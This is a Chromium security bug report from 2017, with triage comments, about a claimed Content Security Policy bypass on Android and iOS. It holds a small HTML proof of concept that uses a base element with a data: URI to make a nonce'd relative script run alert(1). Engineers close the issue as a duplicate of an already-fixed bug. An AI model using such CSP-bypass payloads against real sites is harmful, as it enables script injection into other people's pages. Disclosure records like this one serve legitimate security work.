New issue
Advanced search Search tips

Issue 751366 link

Starred by 1 user

Issue metadata

Status: WontFix
Owner: ----
Closed: Aug 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android , iOS
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Content Security Policy (CSP) Bypass with using base element

Reported by chromium...@gmail.com, Aug 2 2017

Issue description

VERSION
Chrome Version: 60.0.3112.72 stable
Operating System: iOS, Android


PoC: https://jsbin.com/yadunevade

<html>
<head>
<body>
<base href=data:/,-alert(1)/>
  <script src="./lib/jquery.js" nonce=random-secret></script>
</body>
</html>


You will see a alert box.
 
Components: Blink>SecurityFeature>ContentSecurityPolicy
Labels: Needs-Feedback OS-Android OS-iOS
The Proof-of-Concept seems to be identical to  crbug.com/679318 , the fix for which landed in 58.0.3008.0. 

I was not able to reproduce any problem here on either Windows or Android. On iOS, this is out of Chrome's hands as the CSP implementation is provided by WebKit.

Can you please add screenshots of the repro process on Android?
Oops! I forgot to try this on the latest version of stable on Android. 

Sorry. 
Project Member

Comment 4 by sheriffbot@chromium.org, Aug 2 2017

Cc: elawrence@chromium.org
Labels: -Needs-Feedback
Thank you for providing more feedback. Adding requester "elawrence@chromium.org" to the cc list and removing "Needs-Feedback" label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Status: WontFix (was: Unconfirmed)
Thanks for letting me know. If you see something surprising, please do reopen.
Project Member

Comment 6 by sheriffbot@chromium.org, Nov 9 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment